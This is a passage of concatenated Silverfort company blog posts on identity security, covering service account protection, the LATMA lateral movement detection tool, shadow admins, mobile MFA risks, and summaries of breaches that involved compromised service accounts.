potential threats immediately. Granular Access Control The right service account management solution should be able to enforce least-privilege access by allowing admins to implement granular levels of access control and entitlement reviews. For example, they should be able to grant service accounts just enough access to perform their specific functions and nothing more. There should also be a capability to schedule regular reviews of entitlements to ensure accounts do not accumulate unnecessary permissions over time. These controls can mitigate any damage done if a service account is compromised. Silverfort: The Leader in Service Account Protection Silverfort is the industry leader when it comes to service account protection. The Silverfort solution can discover all service accounts across both cloud and on-prem environments, monitor them continuously, and allow granular access control to reduce risk. With Silverfort, organizations will gain full visibility and control over all service accounts so that they can finally close security gaps and stop threats like data breaches and ransomware. Furthermore, Silverfort delivers a purpose-built solution for unified identity protection that can secure all user accounts – including service accounts – at scale. What Are Service Accounts and Why Are They Important? Service accounts are administrative accounts located within operating systems and applications that run automated processes and tasks. They are crucial for system and application functionality but can also become attack vectors for malicious actors. This is why closely monitoring and tracking service account use is crucial for organizations. Common Ways Service Accounts Are Used in an Enterprise Environment Service accounts are commonly used by applications and automated processes in enterprises to access resources and perform certain actions. There are a few common ways service accounts are used: Application AccessService accounts are often used by applications to access data and APIs. For example, a CRM application may use a service account to access a... --- - Published: 2023-06-05 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/introducing-the-latma-algorithm-for-better-lateral-movement-detection/ Lateral movement detection is a challenge every cybersecurity researcher is likely familiar with. My team and I faced this challenge a few months ago and, not surprisingly, quickly discovered there is no easy or fast solution to address it. In this post, I’ll explain the challenge of detecting lateral movement and show you how my team and I significantly improved our ability to detect it with our Lateral Movement Analyzer (LATMA) tool. I’ll discuss the details of this algorithm and explain how it was able to get much better results than others currently available. If you're a practitioner, listen up! Because I’m going to share how you can use our new open-source tool to detect lateral movement in your environment. Understanding Lateral Movement By Examining a Recent Attack Before discussing the detection of lateral movement, let’s first define exactly what it is. And there’s no better way to do this than by using an example. A few months ago, hackers from the cybercriminal group Lapsus$ got access to Uber’s systems via a VPN with regular user credentials they acquired using a social engineering technique called “MFA bombing. ” The attackers scanned the network to find valuable information and eventually found a PowerShell script that contained admin credentials. They then used this admin’s credentials to log in to a database and expose sensitive company information. This attack consisted of several steps: Getting initial access to Uber’s systems — in this case through social engineering. Searching for information and then using it to access other machines in the network and obtain privileged credentials. Using these privileged credentials to fulfill a malicious objective — in this case, exposing sensitive information. Those three steps occur in almost every successful breach. However, only the second step is considered lateral movement since it signals the attackers’ ability to move successfully across an organization’s network. This is the step I’ll focus on. Understanding the Role Authentication Plays in Lateral Movement Movement between machines requires authentication. During this phase, the attacker needs to provide credentials to the identity provider, and only after these are verified can they advance to a target machine. The problem is that normal movement between machines requires authentication as much as malicious movement, and both leave the same traces. This makes distinguishing between normal and malicious movement very hard. One approach to tacking this is through the detection of anomalies. Taking this approach, however, has its own challenges since many anomalies are actually not malicious. For example, when an employee goes to their IT department for help and the IT person logs in to the computer of the person who asked for assistance, this is an anomaly but obviously not a malicious one. Sadly, this is why simple anomaly detection algorithms are actually not very useful. This is why my team and I developed the LATMA algorithm that overcomes this obstacle. The Three Steps to LATMA Detection Step 1: Build a Graph for Abnormal Authentication Traffic In this step, LATMA digests the entirety of authentication traffic in the organization and determines which authentications look normal and which appear abnormal. It does this using information about the domain, such as computer/user roles and their expected behavior. Then authentications are then used to build a graph representing the network, where every node represents a computer and every edge represents an authentication. As mentioned previously, though, finding anomalies is not enough to detect lateral movement, so there are several more steps in the process. Step 2: Finding Patterns of Lateral Movement In this step, we take the authentication graph from the previous step as input and search for lateral movement patterns. These patterns are associated with different types of malicious intent.   We classify the patterns into three categories: Search patterns - Before attackers perform any movement, they will likely search for a good target to advance to. The pattern is: many authentications from a single source (representing the attacker's current location) to multiple servers. Advance patterns - These represent the attackers' movement between different network assets. The attackers might steal credentials along the way and then use them to advance. Act patterns - Usually these occur towards the end of the breach when the attackers have started to fulfill their malicious objectives. These patterns are often characterized by massive automatic access to multiple machines at once in order to steal information or run malware. Step 3: Alerting LATMA generates an alert when at least two of these patterns happen in sequence. For example, if the attacker searches for a target machine to advance to and then successfully advances to it, the algorithm generates an alert. In the example, the attack could have been stopped before the acting pattern, because the algorithm generates an alert if it detects an acting pattern connecting to another pattern. Acting patterns usually mean that the attacker has already fulfilled their objectives. In this case, the output of the algorithm can help with the investigation.   Introducing LATMA: the Lateral Movement Analyzer Tool As part of our research, we developed a free tool that implements LATMA’s logic and outputs a detailed report of all suspicious movements in the environment. The tool consists of two modules: Logs Collector - This module collects authentication traffic from the Active Directory (AD) environment. It gathers the logs from the domain controllers and endpoints, focusing only on interactive Kerberos and NTLM authentications. This module is open-source and can be found here: https://github. com/silverfort-open-source/latma Analyzer Module - This module inputs the logs from the collector and outputs a detailed report containing the patterns that LATMA found, how they’re connected, and who performed them and when. It also visualizes the findings in a GIF. This module is free and can be found here: https://www. silverfort. com/resources/tools/lateral-movement-analyzer-tool-beta/ One of the advantages of this tool is that the results are readable and clear. Because sometimes the hardest part in dealing with an alert is not just knowing that it happened but convincing your team that it was not a false alarm. LATMA’s straightforward output helps address this issue. Watch this full demo of LATMA, from 16:54 - 30:44 The Proof of LATMA Is in the Results If you’ve read this far, I hope you’re convinced that this algorithm and tool have value. So I also want to show you that it is extremely accurate. As part of my job at Silverfort, I get to see authentication traffic from hundreds of different environments, and you might be surprised to learn that many of them are targeted by lateral movement attempts. We know this because either our customer discovered this or Silverfort’s platform alerted us to it. That makes this data good for validation, training algorithms, and testing hypotheses. We ran LATMA on dozens of data sets from different environments. The bottom line is that it detected 95% of lateral movements and generated a false alarm approximately once every three days — almost 30 times better than other existing algorithms! Future Work: Where We’re Going With This The work on the algorithm helped me and my team better understand and model lateral movement attacks. It also made me realize that, despite the significant improvement, there is still a long way to go. Attack surfaces are evolving quickly and attackers have more and more opportunities to take advantage of this, for example by moving from an on-prem environment to the cloud and vice-versa. So a potential enhancement to this algorithm would include logs and events from cloud environments and detection for a lateral movement that crosses platforms. So tuned for more news around LATMA and be sure to let us know your feedback about this tool. --- - Published: 2023-06-01 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/uncovering-the-hidden-risks-of-mobile-device-security/ Organizations often encounter issues when trying to implement best practices in mobile device security while also ensuring a seamless user experience. This is because end users can be hesitant to install additional apps on their mobile device, while others engage in risky practices such as jailbreaking or rooting their phones, sometimes even using custom operating systems (OS) and altering the internal read-only memory (ROM). While this practice may not sound like cause for concern, let's examine in this blog post why they can actually pose a serious problem when it comes to device security. Why SMS and OTP Are Not Considered Secure for MFA Back in 2017, the National Institute of Standards and Technology (NIST) deprecated the use of SMS messages for receiving multifactor authentication (MFA) or one-time passwords (OTP) as a security measure. Unfortunately these practices are still widely used today, but it’s important to understand why this method of authentication is no longer recommended. Although not immediately obvious, the answer is actually quite simple. When you receive a phone call or an SMS, you have no control over the security of your mobile phone provider's network. This means that the weakest link in your security chain is really the person behind the counter of your mobile phone provider. With identity theft so common today, it can be shockingly easy for someone to impersonate you and thus obtain a completely new SIM card for your cell phone without your knowledge. This is exactly why Silverfort does not recommend – or support – using phone calls or SMS texts for OTP codes. Because when you’re developing a security product, it’s important to strive for the highest standards even if this means a slight inconvenience. How Jailbreaking and Rooting Compromise Security This brings us to another element of the security discussion: users who jailbreak or root their phones. Jailbreaking or rooting is not actually the issue, but there are definitely security concerns that arise once these actions have been performed. Consider Samsung Knox. Samsung builds their phones in a way that “blows a fuse” (referred to as the “bit”) if a device is rooted, loaded with a custom OS, or altered in any way beyond its intended usage. You can no longer use a Knox secure container, even if setting the phone back to factory, because the physical bit is now “blown. ” Now, you might view this as simply a warranty denial tactic but it is crucial to acknowledge the potential security concerns at the enterprise level. A Samsung phone with the Knox bit still intact means that the device possesses at least the amount of security that Samsung has integrated into its operating system. This means Samsung can implement secure containers on the phone for enterprise solutions. Let me say that I am not promoting Samsung as a platform or suggesting people switch to it. I simply want to emphasize that Samsung has recognized this as a security measure that people should be aware of. When your device is rooted, jailbroken, or operating on a custom OS, you can no longer guarantee that the security measures put in place are functioning as intended or being appropriately updated. And this is a critical consideration — particularly if your job involves protecting your company's interests and assets. Why does this matter? Because security applications on your devices – including Silverfort – need to trust that the device is secure, updated, and does not pose a risk to the enterprise. And the best way to ensure this is by checking if the device is rooted, jailbroken, or compromised in any way. If any of these conditions are detected, a good security application will not allow the device to be paired. The Critical Role Security Tokens Play in Mobile Device Security Let's examine the security measures employed when you pair your device. Generating a secure token requires considering multiple aspects of your device, such as the CPU ID, RAM serial number, screen resolution, and other factors. All of these are used to create a unique token for your device. In fact, this token is so unique that if you were to clone your phone and transfer the cloned information to a new device, your security token would not work until you deleted it and re-paired your device. It may be somewhat inconvenient, but this level of security is highly effective. This is because by utilizing all these factors to generate the token, you can be confident that no one can clone your phone and thus compromise your security mechanisms. This also explains why, when you buy a new phone and restore from a backup, you need to re-enroll your device across the various authenticators available today. In some case you might not need to re-enroll your device, but this would reduce the security measures for the reasons described above. This information is so important to understand it because our world so heavily relies on mobile devices. For example, when was the last time you left your house without your mobile device? Mobile device security is more critical than ever, and this is why Silverfort takes a proactive approach to protect your company's security. Share your feedback! We’d love to hear what you thought of this article and get your perspective on mobile device security. --- - Published: 2023-05-24 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/how-silverfort-protects-against-the-risk-from-shadow-admins/ Shadow admins are one of the key attack surfaces that adversaries regularly take advantage of. The pattern of discovering a user who has been inadvertently assigned high access privileges is all-too-common in today’s cyber operations. This makes the ability to detect and prevent the abuse of these accounts a top priority for both identity and SecOps teams. In this article we’ll explain in detail how Silverfort’s Identity Threat and Detection (ITDR) capabilities enable the quick discovery of existing shadow admin accounts, the ability to monitor for new ones as they appear, and the securing of their access with MFA policies. Shadow admins recap: what they are and what risks they introduce Shadow admins are user accounts that either have admin access or have a way to achieve it while not actually being part of a documented admin group. As such, neither Identity nor Security teams are aware of their existence, and therefore don’t apply to them the standard monitoring and protection that admin accounts all require. The most common example of this are user accounts that have the privilege of resetting the password of admin users. If adversary gains control of this type of account, they will then be able to use it to reset the passwords of admins and abuse the accompanying high level of privilege to access resources at will. For a detailed explanation of shadow admins, read this article. Silverfort shadow admin protection overview Silverfort enables Identity and SecOps teams to easily discover shadow admins in their environments and either delete them or remove their redundant permissions. In addition, teams have the ability to continuously monitor for the emergence of new shadow admin accounts as well as take proactive protection steps against the attempt of any shadow admin account to gain access to a specific resource, including going as granular as enforcing MFA policies on password reset attempts for shadow admins. These protections are equally effective both for accounts that were inadvertently assigned higher privilege access, as well as against any account manipulation that adversaries might perform that includes modification of the account’s original permissions and privileges. Let’s see exactly how this is done in Silverfort’s console: Discovery and removal of shadow admins Purpose: eliminate all present shadow admins In Silverfort’s Threat Detection screen, under the Attack Surface Management section, search for Shadow Admins. In this example there are two of these. Screen shot #1: discovering shadow admins in the Threat Detection screen Clicking on the Shadow Admins space opens a window that shows you full details on these accounts. Screen shot #2: discovering who these shadow admins are. Now that that we have the names of these shadow admins, we can locate them in Active Directory and either remove their extra permissions or delete them altogether. Continuous monitoring of shadow admins Purpose: detect new shadow admins as soon as they appear On Silverfort’s Authentication Logs screen, add a Risk Indicator filter and check Shadow Admins. Screen shot #3: filtering for shadow admins in the logs screen Click Apply and then adjust the time range to fit your monitoring cadence. This will show you all shadow admins that have been added to the environment within this timeframe. Screen shot #4: discovering newly created shadow admins Following the discovery, you can click the investigation icon of each account to see exactly which resources it has attempted to access since its creation. Screen shot #5: investigating shadow account’s activity Next, you can proceed to either delete the account or downgrade its permissions, similar to what’s been described in the section on discovery and removal of shadow admins.   Risk prevention #1: MFA on all shadow admin access Purpose: prevent shadow admins from connecting to resources without explicit user verification On Silverfort’s Policies screen, create a new policy. Check Active Directory as the Auth Type and then check either Kerberos/NTLM or LDAP, depending on your needs (or if both are required then create two policies). Choose Risk Based for the policy type and have it triggered by Risk Indicator. In the Risk Indicators box check Shadow Admin. Screen shot #6: MFA policy to prevent shadow admins’ access Once enabled, this policy will enforce MFA verification of any account that Silverfort’s risk engine identifies as a shadow admin. If this account were to become compromised, this policy will deprive an adversary of the ability to use this account for malicious access. Silverfort is the only solution that can extend MFA protection to this type of authentication. Risk prevention #2: MFA on shadow admin password reset attempt Purpose: Prevent adversaries from using a shadow admins to reset the password of other accounts. As mentioned earlier, the use of a shadow admin to reset the password of additional admin accounts with higher access privileges is common tactic of threat actors.   Silverfort enables users to mitigate this risk in the following way: In Silverfort’s Policies screen, create a new policy. Check Active Directory as the Auth Type, then check Kerberos/NTLM,choose Risk Based as the policy type, then check the Shadow Admin risk indicator. In the Destination field, instead of placing names or groups of machines as in the former policy, choose krbtgt. This will apply the policy to any access attempt to the krbtgt account within the domain controllers in the environment. Screen shot #7: MFA policy for shadow admin password reset – choosing krbtgt as destination After choosing krbtgt as the destination, click on it to display the list of services. Check the kadmin/changepw and leave the others blank. (This is the service that performs the password reset. ) Screen shot 8: MFA policy for shadow admin password reset – choosing kadmin/changepw as destination Enabling the policy will now trigger an MFA whenever any account Silverfort has marked as a shadow admin attempts to reset another account’s password — fully mitigating this risk. Silverfort is the only solution that can extend MFA protection to this type of authentication. Automated discovery and real-time protection are the keys to mitigating the risk of shadow admins Silverfort’s protection against the malicious use of shadow admins is part of its vision of how Identity protection should be designed and practiced. Silverfort is the first solution that provides end-to-end ITDR capabilities across Active Directory environments. By applying continuous monitoring, risk analysis, and active policy enforcement on every authentication and access attempt, Silverfort can both automate the discovery of shadow admins as well as deliver real-time protection against their abuse. Looking to solve shadow admin challenges in your environment? Reach out to one of our experts here. --- - Published: 2023-05-18 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/applying-service-accounts-security-best-practices-with-silverfort/ Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments and are used by various business applications, and are typically forgotten about unsupervised. Meaning in most organizations nobody is tracking their use or validating that they are not compromised or used by malicious actors. On top of managing these accounts, organizations often lack full visibility into service accounts and how they’re being used, and are seen as low-hanging fruit for threat actors. However, service account management is a critical task that should not be overlooked, as service accounts often have privileged access and are used by applications, scripts, and services to authenticate and interact with various systems and resources. If service account management is overlooked, it can lead to malicious actors with access to compromises service accounts carrying out malicious activities such as lateral movement. In this post, we will explain how Silverfort enables you to manage your service accounts easily, through automated detection, monitoring, and protection. As a result, Silverfort is able to provide full visibility, risk analysis, and adaptive access policies for service accounts without the need for password rotation. Best Practices for Service Accounts Protection While service accounts can be associated with an owner and these accounts' activities should be continuously monitored, they should not have the same privileges as a regular user account. This means that service accounts should not have interactive user interface privileges or the ability to operate as normal users. By implementing Silverfort’s Unified Identity Protection platform, organizations can apply best practices to get their management of service accounts under control. This involves a three-step approach: Discover all service accounts Monitor activity and risk analysis Analyze and enable access policies With these capabilities implemented, service account management is no longer a nightmare, and, at the same time, the risk of security breaches caused by mismanaged service accounts is dramatically reduced. Here are more details on Silverfort’s three-step approach: 1. Discovery The first step to properly managing and protecting all service accounts is knowing exactly where they reside. Here are several key questions to ask: What service accounts do you have? What is the total number of service accounts? Which assets use those service accounts? Silverfort’s Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info This is done when an organization connects its domain controllers to Silverfort. Silverfort is then able to automatically identify all service accounts, providing complete visibility into their behavior patterns. This is because, as machine accounts, service accounts display predictable behavior patterns, allowing Silverfort to identify and categorize them automatically. Silverfort identifies and categories three main types of service accounts: • Machine to Machine (M2M) Accounts– defined on Active Directory (AD) or another user repository • Hybrid Accounts – used by both users and machines • Scanners – used by a few devices to communicate with a large number of resources inside a network Silverfort can also quickly identifies any accounts that follow usual service account naming conventions (e. g. “admin” or “svc”), as well as any custom naming conventions that may be used by the organization. Because Silverfort can detect all machine-like behavioral patterns, it can also flag whether an account is also being used by a human user and alert on this bad practice. Silverfort detects the erratic patterns associated with human user activities that do not correlate with the machine’s behavior patterns and alerts the irregular activity of the service account.   2. Monitoring & Risk Analysis The next and continuous phase is monitoring all service account activity and associated risks. Now that there is a complete picture with full visibility into all service account details and behavior, Silverfort constantly monitors and audits their use. Silverfort’s Investigation screen shows various insights into a specific service account's activity.   Silverfort can identify different configurations and behaviors of service accounts, such as high-level permissions, broad use, repetitive behavior, etc. Silverfort then adds risk analysis and level of predictability to each service account to enable administrators to better understand the degree to which specific service accounts are at risk. By continuously monitoring all authentication and access activity, Silverfort can assess the risk of every authentication attempt and thus immediately detect any suspicious behaviors or anomalies, providing SOC teams with actionable insights into overall service account activity. The importance of monitoring and auditing Active monitoring and auditing are crucial components of service account management. By keeping a close eye on the activities of these accounts, organizations can swiftly detect any suspicious behavior and take necessary action to prevent potential breaches. Active Monitoring and Anomaly Detection Active monitoring involves continuously tracking and analyzing the activities of service accounts to identify any deviations from normal behavior patterns. This could be an unusually high number of failed login attempts, modifications to account privileges, or changes in login locations or times. By setting up automated alert systems, organizations can be notified of such anomalies in real-time, enabling them to respond promptly to potential threats. Auditing and Authentication Monitoring The purpose of auditing is to ensure compliance with organizational policies and regulatory requirements by conducting periodic reviews of service account activities. Authentication monitoring, on the other hand, focuses on verifying the identities of the users attempting to access service accounts. Both these measures help in maintaining accountability and enhancing the overall security of service accounts. Visibility and Auditing Challenges Managing service accounts comes with numerous visibility and auditing challenges. Without proper tools and processes in place, it can be difficult to keep track of all service accounts within an organization, especially in large-scale environments with hundreds or even thousands of accounts. Dormant and Forgotten Service Accounts One common issue is the existence of dormant or forgotten service accounts. These are accounts that have been created for a particular purpose but are no longer in use, either because the project they were associated with has ended, or the employee who created them has left the organization. These dormant accounts can pose a serious security risk as they could be exploited by malicious actors to gain unauthorized access to the system. Therefore, it's important to regularly audit service accounts and deactivate any that are no longer needed. Sharing of Service Account Credentials While this may seem convenient to share the credentials, it significantly increases the risk of a security breach. If the credentials are compromised, all services using those credentials become vulnerable. To mitigate this risk, each service should have its own dedicated service account with unique credentials. 3. Analyze & Access Policies Once full visibility and insight into all service accounts are achieved, the next phase is to analyze these insights and create access policies to provide a digital fence for these non-human accounts. Silverfort displays a list of sources and destinations using the service accounts, as well as the number of hits (authentications) Silverfort enables admins to analyze their service accounts' insights to identify certain service account behaviors. Silverfort shows the number of hits per source and destination. This helps admins prioritize the different sources and destinations that their service accounts connect to, ensuring they are properly monitored and protected. With the help of Silverfort, admins will examine the service account behavior, using one of the following methods: 1. Understand which users are used by the crown jewels applications and analyze these service accounts. 2. Analyze the critical risk level accounts and then go through the chain to the lower risk levels (from the risk levels provided by Silverfort). 3. Analyze and prioritize the service accounts with high privileges and then continue to the accounts that are broadly used and finish with accounts with interactive logins. After analyzing the service accounts, Silverfort automatically recommends specifically tailored policies for each service account. Each security policy is formulated to lower the network risk level without blocking the traffic and tracking policy violations. This is focused on monitoring the traffic and allows the admin to make sure that the created policy is full without impacting the traffic. Silverfort has three types of authentication policies for service accounts: Block access Alert to SIEM Alert For each policy created with Silverfort, administrators can choose sources, destinations, authentication protocols, when policies should be applied, and what actions the system should take in case of a deviation. In the case of an organization with a large number of service accounts, Silverfort allows admins to create general policies that can be assigned to multiple service accounts. This can be done by using Silverfort’s recommended policies. Once policies have been created for all service accounts with Silverfort, admins can simply enable and automatically enforce these policies without the need to make any changes to applications, change passwords, or make use of any proxies. With complete visibility into these accounts and the ability to proactively protect service accounts with access policies ,organizations will now be well-equipped to reduce their attack surface area from compromised service accounts. Learn More About Silverfort's Service Account Protection The alarming reality of service account compromises cannot be ignored, as they continue to occur regularly and have been instrumental in major, high-profile cyberattacks. These incidents serve as stark reminders of the critical importance of securing service accounts and implementing robust protective measures. The compromised service accounts have emerged as a preferred target for malicious actors due to their elevated privileges and widespread access within organizations. These accounts often hold the keys to the kingdom, granting unauthorized malicious actors entry to sensitive data, critical systems, and confidential resources. To address this organizations must prioritize the implementation of the service accounts security best practices such as strong authentication, regular monitoring, and deploying strict access policies. By prioritizing service account security, organizations can mitigate the risk of compromised service accounts being deployed by malicious actors in cyber attacks. Interested in seeing how Silverfort can help you to discover, monitor, and protect service accounts? Request a demo here. --- - Published: 2023-05-11 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/3-cyberattacks-in-which-compromised-service-accounts-played-a-key-role/ Securing service accounts is a notoriously difficult task. One of the main reasons for this difficulty is that service accounts are often forgotten about and left unsupervised. Resulting in no one tracking their use or validating that they aren’t compromised and used by malicious actors. Additionally, having limited to zero visibility into these accounts is a key challenge when it comes to securing service accounts. The lack of visibility into service accounts also makes them an attractive target for threat actors. These accounts can be used to gain unauthorized access to sensitive data, systems, and resources and in many cases move laterally across an organization's environment. The consequences of a successful attack on a service account can be severe, including data theft, system compromise, and even complete network takeovers. In this post, we’ll explore the specific attack techniques threat actors utilize when targeting service accounts and will highlight a few well-known data breaches where service accounts were compromised and helped attackers move laterally. Attack Methods Used to Compromise and Use Service Accounts Threat actors implement different techniques to compromise and use service accounts. Let's take a closer look at the most commonly used identity-based attack methods used and how specifically they take aim at service accounts. Brute Force A brute force attack is the most common method used by threat actors, where attempts are made to guess a password or encryption key by trying all possible combinations of characters until the correct one is found. This method is particularly effective against weak or easily guessable passwords. Threat actors commonly use automated tools to rapidly try different passwords until they find one that works. Threat actors will often use brute-force attacks to compromise service accounts that have weak passwords or no password policies, sometimes also attempting to bypass the security measures in place to protect against these types of attacks. Kerberoasting A Kerberoasting attack is a type of attack that targets the Kerberos authentication protocol to obtain the password hash of a user's Active Directory with Service Principal Name (SPN) values — such as service accounts. The threat actor first identifies the targeted users that have SPNs associated with them. They then request a Kerberos service ticket for a specific SPN associated with a user account. The service ticket is encrypted using the user's hash. Next, the threat actor is then able to obtain the hhash itself via offline cracking and reproduce the original plaintext password. Service accounts are often targeted as they often have SPNs associated with them, which can then be used to request service tickets for other user accounts. Pass-The-Hash In a pass-the-hash attack, the threat actor can use a password hash to perform an NTLM authentication to other systems or services on the network without needing to know the actual password. To carry out a pass-the-hash attack, the threat actor first obtains the service account’s password hash by either extracting it from a compromised endpoint’s memory or by intercepting the service account’s authentication traffic. Notorious Cyber Attacks That Used Compromised Service Accounts In recent years, there have been several high-profile data breaches where service accounts were successfully compromised by threat actors. These attacks are clear examples of how threat actors target and use comprised service accounts to move laterally. By understanding these cases, we can gain a better appreciation of the risks associated with unsecured service accounts and the measures organizations can take to mitigate risks. SolarWinds The SolarWinds attack was a supply chain attack in December 2020. Threat actors compromised the SolarWinds Orion IT management platform build process and inserted a malicious backdoor into the codebase. This backdoor was then distributed to numerous organizations via legitimate software updates. Once installed on the target networks, the backdoor provided the threat actors with persistent access to the target systems, allowing them to exfiltrate data and move laterally within the networks. How Service Accounts Were Involved Service accounts played a crucial role in the SolarWinds attack. Compromised service accounts were used by the threat actors to move laterally through the targeted networks and access their resources. The threat actors targeted service accounts with high-level privileges, which allowed them to gain access to critical systems and data. Once the threat actors gained access to the SolarWinds Orion IT management platform, they were able to obtain the credentials for several service accounts of SolarWinds. Once these accounts were compromised, the threat actors used the SolarWinds service accounts to move laterally through the network until reaching the ADFS server. US Office of Personnel Management The data breach of the United States Office of Personnel Management (OPM) was discovered in June 2015. This was a classic example of a state-sponsored cyber-espionage operation by the Chinese advanced persistent threat (APT). The OPM breach was facilitated by several technical and architectural gaps in the agency's IT infrastructure where threat actors were able to gain access to OPM's systems using stolen credentials belonging to a third-party contractor who had privileged access to their network. How Service Accounts Were Involved The attackers initially gained access to the OPM network through a spear-phishing email, which allowed them to obtain the credentials of several OPM contractors. Once inside the network, the threat actors used the compromised credentials to gain access to several service accounts, including the KeyPoint Government Solutions (KGS) contractor's service account. This account had high-level privileges and was used to manage and administer critical OPM systems. The threat actors used the KGS contractor's service account to move laterally through the network and access sensitive data, including the background investigation records of millions of current and former federal employees. The threat actors were able to exfiltrate this data over several months, during which time they remained undetected. They also used the service accounts to create backdoors on the network, which allowed them to maintain access to the network even after the initial breach had been detected. Marriott Disclosed in 2018, the Marriott attack was one of the largest data breaches on record. Threat actors gained access to the company's systems through a third-party vendor who had access to Marriott's reservations database. Once inside the network, they were able to move laterally and escalate privileges in Marriott's Active Directory infrastructure. After gaining access the threat actors installed malware, which was used to steal data over several years. The breach went undetected for months, giving the threat actors ample time to steal large amounts of data. How Service Accounts Were Involved Threat actors were able to obtain the credentials of two privileged service accounts with domain-level admin access. They deployed a pass-the-hash attack where the threat actors used the password hashes then used to compromise service accounts with high-level privileges to access Marriott’s Starwood reservation system, which contained the sensitive personal and financial information of millions of guests. These service accounts had access to sensitive systems and data across the Marriott network, and their compromise allowed the attackers to move laterally through the network and escalate their privileges over an extended period of time, without being detected by Marriott's security controls. The Common Thread: Service Account Compromise In each of these cases, threat actors were able to gain unauthorized access to sensitive systems or data by using compromised service accounts to move laterally across their victim’s network. These breaches highlight the importance of properly managing and securing service accounts to prevent unauthorized access and reduce the risk of breaches. Next Up: Securing Service Accounts with Silverfort Now that we’ve discussed attack methods used by threat actors when targeting service accounts and highlighted high-profile breaches where service accounts were involved, our next post will show how Silverfort helps organizations discover, monitor, and protect service accounts by providing full visibility, risk analysis, and adaptive access policies without the need for password rotation. --- - Published: 2023-05-06 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/how-to-find-service-accounts-in-active-directory/ Service accounts are a critical component of any enterprise environment, used to perform a variety of automated processes. However, these accounts can pose a significant security risk if not properly managed and monitored. In this article, we will explore how to find service accounts in Active Directory (AD) and discuss how Silverfort's solutions can help enhance your security posture. Understanding Service Accounts Service accounts are special types of accounts in Active Directory that provide a security context for services running on a server. These accounts have unique permissions and privileges that allow them to perform specific tasks. However, due to their elevated access privileges, they can become prime targets for attackers if left unmonitored or unprotected. Service accounts are typically used to run scripts, manage applications, or perform other automated functions. Unlike regular user accounts, service accounts are not associated with any specific individual but rather serve as a means for services and applications to interact with the network. They are designed to operate in the background without requiring human intervention. Because service accounts have elevated access privileges, this makes them prime targets for attackers. Therefore, it is essential to ensure that service accounts are adequately protected and their activities are closely monitored to prevent any potential security breaches. Finding Service Accounts in Active Directory Finding service accounts in Active Directory can be a complex task due to the vast number of accounts and the intricate nature of AD structures. However, it is an essential step in ensuring the security of your network. To find service accounts in Active Directory, follow these steps: Review the documentation: Start by reviewing any existing documentation or inventory lists that may contain information about service accounts. This could include names, descriptions, and associated applications or scripts. Use Active Directory tools: Utilize the built-in Active Directory tools to search for service accounts. One commonly used tool is the Active Directory Users and Computers (ADUC) console. Open ADUC, navigate to your domain, and use the search feature to filter for accounts with specific attributes commonly associated with service accounts, such as "ServiceAccount" in the description field. Check for special account flags: Service accounts often have special account flags set to indicate their purpose. These flags can include "DONT_EXPIRE_PASSWORD" or "PASSWORD_NOT_REQUIRED. " You can use PowerShell commands or LDAP queries to search for accounts with these flags. Examine group membership: Service accounts are frequently members of specific security groups that grant them the necessary permissions to perform their tasks. Review the membership of groups like "Domain Admins," "Enterprise Admins," or other groups that are known to have elevated privileges. Monitor application dependencies: Identify applications or services that rely on service accounts to function properly. Consult with application owners or system administrators to gather information about the associated service accounts. Audit event logs: Regularly monitor event logs on domain controllers and other critical servers for events related to service accounts. Look for logon events, password changes, or other activities that may indicate the usage of a service account. Remember, in addition to taking inventories of service accounts, it's crucial to regularly review and update their permissions, enforce strong password policies, and monitor their activities to ensure the security of your Active Directory environment. By taking these steps, you can mitigate the risks associated with service accounts and strengthen your overall security posture. Silverfort's Solution: Automated Discovery and Monitoring Silverfort offers an automated solution for discovering and monitoring service accounts within your environment. Through its native integration with Active Directory, Silverfort can analyze every access attempt, regardless of the authentication protocol used. This means that Silverfort can automatically identify any account that features predictable and repetitive behavior, classify them as a service account, and protect them with access policies. As a result, any deviation from the standard activity of a service account can trigger an action such as blocking access to the targeted resource, adding an extra layer of protection. This type of “virtual fencing” means that service accounts can now be fully protected from misuse by threat actors. Conclusion In today's complex cybersecurity landscape, managing and protecting service accounts in Active Directory is crucial. Silverfort's automated discovery, activity monitoring, and access policy creation for all service accounts within the environment provides a comprehensive solution so organizations can be confident that their service accounts are secure, reducing the risk of breaches and enhancing overall network security. --- - Published: 2023-05-02 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/the-security-risks-of-service-accounts-you-cant-protect-what-you-cant-see/ Service accounts play an important role in today’s enterprise environment. These non-human or machine-to-machine (M2M) accounts are used by applications, systems, and services to perform important automated tasks in a network. They need access to resources such as databases, file shares, and other resources to perform their routine tasks. Because of their central role, these accounts often have privileged access so that they can carry out their functions without the need for human interaction. If not properly managed, however, service accounts can pose significant risks, enabling threat actors using the compromised credentials of service accounts to take them over and move laterally throughout a network undetected. In this post, we’ll explore what service accounts are and how they’re used and explain the security risks organizations can face if they’re not managed correctly. This is the first part of a three-post series discussing service account security. What Service Accounts Are and Why They’re Important Service accounts are dedicated non-human accounts that IT admin creates to run on different machines or in some cases are accounts that are created by process, such as software installation. These accounts are usually defined on the Active Directory (AD). Systems, applications, and administrators use service accounts to interact with other systems, for example, a file manager or an SQL server agent. They perform automatic, repetitive, and scheduled actions in the background, usually without human intervention. Some examples of the different types of tasks that service accounts perform include running an application on a Windows operating system, automated backups, performing database maintenance and more. These machine accounts can be found across an organization's network. Certain “hybrid” users, such as infrastructure administrators, and application owners may run scripts from their personal user accounts to machines and essentially act as service accounts. When a service account is created, it is typically given a set of permissions that allow it to perform specific tasks or access specific resources. In most cases, their permissions are defined by the administrator who created the service account. In a situation where the service account was created by a process, their permissions will be configured by the package manager during the installation of the software that the service account will be connecting to. Different Types of Service Accounts There are usually several different types of service accounts in an environment, each one with a specific role. In general, service accounts fall under two scenarios: Service accounts created by admins to automate specific tasks. Service accounts created during processes, for example during software installation. Service accounts are usually categorized into specific types based on their exact behavior and permissions level. For organizations that have a large number of service accounts, this tends to be the mix: Machine to Machine (M2M) Accounts – used exclusively by machines to interact with other machines or services; examples include, a web container communicating with a database container or an application communicating to an endpoint. Hybrid Accounts – used primarily for M2M access but sometimes used by human users to access specific resources; for example, admin users who run scripts to gain access to shared file servers, databases, or management systems. Scanners – used by a few devices to communicate with a large number of resources inside a 